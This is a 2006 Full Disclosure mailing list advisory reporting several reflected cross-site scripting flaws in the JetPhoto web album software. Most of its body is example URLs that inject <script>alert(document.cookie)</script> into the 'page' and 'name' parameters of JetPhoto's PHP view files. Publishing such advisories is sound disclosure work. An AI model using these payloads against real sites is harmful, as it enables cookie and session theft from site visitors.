Full Disclosure mailing list archives
JetPhoto Multiple Cross-Site Scripting Vulnerabilitie
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan () gmail com>
Date: Mon, 10 Apr 2006 20:52:08 -0500
########################################################################### # Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilitie # # # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: zeus () diosdelared com # Website: www.elitemexico.org # Date: 10/04/06 # Risk: Medium # Vendor Url: http://www.jetphotosoft.com # Affected Software: JetPhoto # Non Affected: # #Info: ################################################################## #this bug consists of inserting script in the line of execution of # #the affected system causing the robbery of cookie # #Example XSS: ################################################################## # #http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert( document.cookie);</script> # #http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=JetPhoto_Album&page=<script>alert( document.cookie);</script> # #http://www.vuln.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert( document.cookie);</script> # #http://www.vuln.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert( document.cookie);</script> # #http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert( document.cookie);</script> # #http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert( document.cookie);</script> # #http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert( document.cookie);</script> # ################################################################## # #Solution: ################################################################## # # #VULNERABLE VERSIONS ################################################################## #all # ################################################################## #Contact information #0o_zeus_o0 #zeus () diosdelared com #www.elitemexico.org ################################################################## #greetz: lady fire,Mi beba, olimpus klan team and elitemexico # # original advisorie: http://www.elitemexico.org/11.txt ##################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- JetPhoto Multiple Cross-Site Scripting Vulnerabilitie 0o_zeus_o0 elitemexico.org (Apr 10)